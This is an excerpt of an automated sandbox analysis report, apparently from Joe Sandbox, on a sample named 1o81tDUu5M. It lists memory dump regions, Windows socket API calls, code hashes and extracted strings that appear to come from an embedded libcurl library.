                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: ioctlsocketsocket
                                                              • String ID:
                                                              • API String ID: 416004797-0
                                                              • Opcode ID: cf6596954874e75f7f133593eb9f33393af34b619ed901de9d39033f7c088578
                                                              • Instruction ID: 24d359dcb54a86f3eb2b71a0d47d075236b25139770e06a0d68ef4c4a5de708a
                                                              • Opcode Fuzzy Hash: cf6596954874e75f7f133593eb9f33393af34b619ed901de9d39033f7c088578
                                                              • Instruction Fuzzy Hash: 28E1BFB06043059BEB20CF24C884B7B77E9EF89314F144A2DFA9D9B291E775D944CB92
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: closesocket
                                                              • String ID: FD %s:%d sclose(%d)
                                                              • API String ID: 2781271927-3116021458
                                                              • Opcode ID: ed85444c98a164b14fa7a9cdc323383cd58c6193d2e78a38108c4e0f6d2ac814
                                                              • Instruction ID: c415611eee94dca4c295f783f521ae092e5bb8b00e36f171960211c386d57d8f
                                                              • Opcode Fuzzy Hash: ed85444c98a164b14fa7a9cdc323383cd58c6193d2e78a38108c4e0f6d2ac814
                                                              • Instruction Fuzzy Hash: B0D05E72A192616B85306599AC48C4BBBA8DDC6FA0F050858F94077200E1219C0587F2
                                                              APIs
                                                              • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,009FB29E,?,00000000,?,?), ref: 009FB0BA
                                                              • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,009E3C41,00000000), ref: 009FB0C1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastconnect
                                                              • String ID:
                                                              • API String ID: 374722065-0
                                                              • Opcode ID: 50e383172e1923b0091d0da412c13a358632b12e7c49fffa58ffe65b11e3d211
                                                              • Instruction ID: e548407946144857ff430bf6bc997e81e1d635dddbd3187c58da9823d3d703cc
                                                              • Opcode Fuzzy Hash: 50e383172e1923b0091d0da412c13a358632b12e7c49fffa58ffe65b11e3d211
                                                              • Instruction Fuzzy Hash: 0201D8363042089BDA205E68C844F7BB399FF89364F180B54FA78931D5DB26ED509762
                                                              APIs
                                                              • gethostname.WS2_32(00000000,00000040), ref: 009E4AA5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: gethostname
                                                              • String ID:
                                                              • API String ID: 144339138-0
                                                              • Opcode ID: 30201ad2dc9516db1139f0c02b557ce8e5cf6ad8c6489dace180caa9125c9c53
                                                              • Instruction ID: ce65d7b127e487a8d6efa0710a57202e7fe0c0b365ccf017f65692ba2785c2b1
                                                              • Opcode Fuzzy Hash: 30201ad2dc9516db1139f0c02b557ce8e5cf6ad8c6489dace180caa9125c9c53
                                                              • Instruction Fuzzy Hash: 475106706047809BE7329B27DD4972776DCEF84724F18083DE98A966D2E778EC44D706
                                                              APIs
                                                              • getsockname.WS2_32(?,?,00000080), ref: 009FAFD0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID:
                                                              • API String ID: 3358416759-0
                                                              • Opcode ID: 970bfac099db1ddab5a201f986c0205bb34e7d4e9e44ee9f77446b1d66dbc6a0
                                                              • Instruction ID: a076dd5dcd04be072253833278f78d502f2f8be7d7d12b8524b87f7632f87d7f
                                                              • Opcode Fuzzy Hash: 970bfac099db1ddab5a201f986c0205bb34e7d4e9e44ee9f77446b1d66dbc6a0
                                                              • Instruction Fuzzy Hash: DC11967080878496EB268F18D8027F6B3F8EFD0328F109A18E6D942150F7369AC58BC2
                                                              APIs
                                                              • send.WS2_32(?,?,?,00000000,00000000,?), ref: 009FA97F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: send
                                                              • String ID:
                                                              • API String ID: 2809346765-0
                                                              • Opcode ID: c382f9184dd6c21743723c5240e6a066395c14ea8ea466a422fc508636d0771f
                                                              • Instruction ID: a434f2641f486676f0cec758759d26686d1121e4669c1d09ef902e9d3865c8a2
                                                              • Opcode Fuzzy Hash: c382f9184dd6c21743723c5240e6a066395c14ea8ea466a422fc508636d0771f
                                                              • Instruction Fuzzy Hash: AE01DBB5B007149FD714CF14DC45B66B7A5EF84720F06855DFA982B361C331AC508BE1
                                                              APIs
                                                              • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,009E712E,?,?,?,00001001,00000000), ref: 009FA90D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: recvfrom
                                                              • String ID:
                                                              • API String ID: 846543921-0
                                                              • Opcode ID: f5314a2a1917e928bb1aaafcc98f00ce39334f518b4ffb06caf9fa385812c71a
                                                              • Instruction ID: 07bf21370bd656fd7f25cc5cda3c9f7bc27365cf7d07c2561f0303aeb8dc5c23
                                                              • Opcode Fuzzy Hash: f5314a2a1917e928bb1aaafcc98f00ce39334f518b4ffb06caf9fa385812c71a
                                                              • Instruction Fuzzy Hash: D3F049B5108308AFD2109A01DC44D7BBBADEBC9754F05896DF94C232118270AE108AB2
                                                              APIs
                                                              • socket.WS2_32(?,009FB280,00000000,-00000001,00000000,009FB280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 009FAF67
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: socket
                                                              • String ID:
                                                              • API String ID: 98920635-0
                                                              • Opcode ID: 4887699089bf3a24cd5444ecc2ef47f5ef8db922f66f302cb55ccffb1dbc2562
                                                              • Instruction ID: 069493313267759d193eb9d38638e3c32488362dd2c419960952ffaa8e42b96a
                                                              • Opcode Fuzzy Hash: 4887699089bf3a24cd5444ecc2ef47f5ef8db922f66f302cb55ccffb1dbc2562
                                                              • Instruction Fuzzy Hash: 55E0EDB6A092216FD654DE18E8449ABF36DEFC4B20F054A49B95467304C330AC5087E2
                                                              APIs
                                                              • closesocket.WS2_32(?,009F9422,?,?,?,?,?,?,?,?,?,?,?,009E3377,00D77680,00000000), ref: 009FB04D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: closesocket
                                                              • String ID:
                                                              • API String ID: 2781271927-0
                                                              • Opcode ID: 87ea3473b619b9a2399de5c89d5095de4fa07bbee8d191429200a33c1f2b5222
                                                              • Instruction ID: 6a08bba93ce039985144f6df7154b6103af431db4bb1543766676d92e1c34958
                                                              • Opcode Fuzzy Hash: 87ea3473b619b9a2399de5c89d5095de4fa07bbee8d191429200a33c1f2b5222
                                                              • Instruction Fuzzy Hash: 1CD08C3830020197CA209E14C884A67722B7FC0310FACCA68A12C4A158DB3BCC428701
                                                              APIs
                                                              • ioctlsocket.WS2_32(?,8004667E,?,?,0096AF56,?,00000001), ref: 009967FC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: ioctlsocket
                                                              • String ID:
                                                              • API String ID: 3577187118-0
                                                              • Opcode ID: 90d838889068e61e899048704fce648e72b8297ab78ccf7c617e310d24fa89cb
                                                              • Instruction ID: b1655764e4dcdbc3f01eeb42c5cdaf68e392172bccfb74209a509df258ccb336
                                                              • Opcode Fuzzy Hash: 90d838889068e61e899048704fce648e72b8297ab78ccf7c617e310d24fa89cb
                                                              • Instruction Fuzzy Hash: 9DC080F121C101BFD70C8714D455B2F77E8DB84355F01581CB086D1180FA345990CF17
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: 8e76b9f0b2822722bd4001f96bc5107541a80e07a8ee4b4e1a3c681e59935c89
                                                              • Instruction ID: 15f8d6df74b6ee43c853910fdeadc7d4859a65e83bef330c04d8a9f7ba20411b
                                                              • Opcode Fuzzy Hash: 8e76b9f0b2822722bd4001f96bc5107541a80e07a8ee4b4e1a3c681e59935c89
                                                              • Instruction Fuzzy Hash: FCC04CA4D1464446D744BB38854611D79E47741104FC11A68998896196F66893188667
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1822175701.0000000006D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d70000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ef72a60134d3f40339f0f85343632ef7e7e870d82fc87dbc64e79ff9f94772af
                                                              • Instruction ID: 062756bc2693b8493f4ef906ce5494ab319c3897c906a7980564c9fa6c0c5a41
                                                              • Opcode Fuzzy Hash: ef72a60134d3f40339f0f85343632ef7e7e870d82fc87dbc64e79ff9f94772af
                                                              • Instruction Fuzzy Hash: AB3107EB14C124BDB3C285D05B14AFAA6BEEAD73717304036F483D5682F2948B4952B3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                                              • API String ID: 0-1371176463
                                                              • Opcode ID: aec09a5deebeef829f12b66dfc5b3407752dda40b89c8540288e2c8c1d6a6ab2
                                                              • Instruction ID: 6707c7908a189d3c19ec316bf8ae96e72c6c4a1ea0c27cec1f39b2821b2fd2cb
                                                              • Opcode Fuzzy Hash: aec09a5deebeef829f12b66dfc5b3407752dda40b89c8540288e2c8c1d6a6ab2
                                                              • Instruction Fuzzy Hash: 5FB22672A18701AFD7359B24EC42B66BBD9AF84704F08C828F98D97283E775EC44D752
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                                              • API String ID: 0-122532811
                                                              • Opcode ID: 77f9901272304eeec04a9d5fc67ebf261504ba90932947fd5bc9dedf713b3f9b
                                                              • Instruction ID: 06e9eeb7f7aaa42bfc08a31c36f1284f738b10cecc6964d68b1b946b2aabee4e
                                                              • Opcode Fuzzy Hash: 77f9901272304eeec04a9d5fc67ebf261504ba90932947fd5bc9dedf713b3f9b
                                                              • Instruction Fuzzy Hash: 0A42C571B08700AFD718DE28CC81FABB7EAEBC4704F058A2CF55D97291D775A9148B92
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Apr$Aug$Dec$Feb$Jan$Jul$Jun$Mar$May$Nov$Oct$Sep
                                                              • API String ID: 0-3977460686
                                                              • Opcode ID: 2e2a9faf642aedbcd0876ec120ad4855efd4b075019c6effc54d0696294ab288
                                                              • Instruction ID: 56fd905a6197d245187c18e68b76bd7b63f3000a3464d1a273b35e19264ddb12
                                                              • Opcode Fuzzy Hash: 2e2a9faf642aedbcd0876ec120ad4855efd4b075019c6effc54d0696294ab288
                                                              • Instruction Fuzzy Hash: 81328EB1A083014FCB24AF389C41B1A77DAAFD1324F154B2DF9A59B3D2E774D9458782
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: -vc$ans$ate$attempts$ndot$out$retr$retr$rota$time$use-$usev
                                                              • API String ID: 0-1574211403
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
                                                              • API String ID: 0-1914377741
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %2lld.%0lldG$%2lld.%0lldM$%4lldG$%4lldM$%4lldP$%4lldT$%4lldk$%5lld
                                                              • API String ID: 0-3476178709
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $.$;$?$?$xn--$xn--
                                                              • API String ID: 0-543057197
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                                              • API String ID: 0-2555271450
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                                              • API String ID: 0-2555271450
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: default$login$macdef$machine$netrc.c$password
                                                              • API String ID: 0-1043775505
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: FreeTable
                                                              • String ID: 127.0.0.1$::1
                                                              • API String ID: 3582546490-3302937015
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .DAFSA@PSL_$===BEGIN ICANN DOMAINS===$===BEGIN PRIVATE DOMAINS===$===END ICANN DOMAINS===$===END PRIVATE DOMAINS===
                                                              • API String ID: 0-2839762339
Strings
Similarity
• API ID:
• String ID: $d$nil)
• API String ID: 0-394766432
Strings
Similarity
• API ID:
• String ID: 0123456789$0123456789ABCDEF$0123456789abcdef$:
• API String ID: 0-3285806060
Strings
Similarity
• API ID:
• String ID: .$@$gfff$gfff
• API String ID: 0-2633265772
Strings
Similarity
• API ID:
• String ID: %$&$urlapi.c
• API String ID: 0-3891957821
Strings
Similarity
• API ID:
• String ID: $
• API String ID: 0-227171996
Strings
Similarity
• API ID:
• String ID: -----END PUBLIC KEY-----$-----BEGIN PUBLIC KEY-----$vtls/vtls.c
• API String ID: 0-424504254
Strings
Similarity
• API ID:
• String ID: #$4
• API String ID: 0-353776824
Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #$4
                                                              • API String ID: 0-353776824
                                                              • Opcode ID: aa3d81908d3ecfc74d4f23fb4c6d5a0f05227800a08e888fb616fbf31a5ebd1e
                                                              • Instruction ID: 9440f12418ad8a761d00abe5fb38ab6a00b727bbdaa2cf668dfe6e5981f00107
                                                              • Opcode Fuzzy Hash: aa3d81908d3ecfc74d4f23fb4c6d5a0f05227800a08e888fb616fbf31a5ebd1e
                                                              • Instruction Fuzzy Hash: DF12E132A087128BC724CF28C4847ABB7E1FFD5318F198A7DE99957391D7349984CB82
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: H$xn--
                                                              • API String ID: 0-4022323365
                                                              • Opcode ID: 9f3b09a2f871e878a734e49399baae7a0cc6794d1ba2439ecad811d2a15974b9
                                                              • Instruction ID: 22c6bc2137d045cf8745d6d1fef62d7a2080be990a88268b3a53f60f4dd8b86f
                                                              • Opcode Fuzzy Hash: 9f3b09a2f871e878a734e49399baae7a0cc6794d1ba2439ecad811d2a15974b9
                                                              • Instruction Fuzzy Hash: 5FE12671A0C7158BD71CDE28D8C07AAB7E2ABC4314F198B3DE9A687382E774DD458742
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Downgrades to HTTP/1.1$multi.c
                                                              • API String ID: 0-3089350377
                                                              • Opcode ID: efcc478be46b262d4c71f77b9e39224f69719538117fa3375dbbb0f58efcfe42
                                                              • Instruction ID: 36f1340f2e1f499127bb3c1bfb9528d732322bb1b494a54717585e1ce518a414
                                                              • Opcode Fuzzy Hash: efcc478be46b262d4c71f77b9e39224f69719538117fa3375dbbb0f58efcfe42
                                                              • Instruction Fuzzy Hash: 0BC10575A08701ABD7149F64D881F6BB7E5BFD4304F04893CF99887292E770E998CB92
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: D
                                                              • API String ID: 0-2746444292
                                                              • Opcode ID: e2b941407947bc7e14958a579725416c28e54f29a52ea05c8b83999412471686
                                                              • Instruction ID: de115b9d36f36b2d9189169d449a137a30ee7a4239bec3ac50ab0a8d4f19ac45
                                                              • Opcode Fuzzy Hash: e2b941407947bc7e14958a579725416c28e54f29a52ea05c8b83999412471686
                                                              • Instruction Fuzzy Hash: 31328C7290D7818BC725DF29D4806AEF7E1BFC9304F158A2DE9D9A3351DB30A945CB82
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
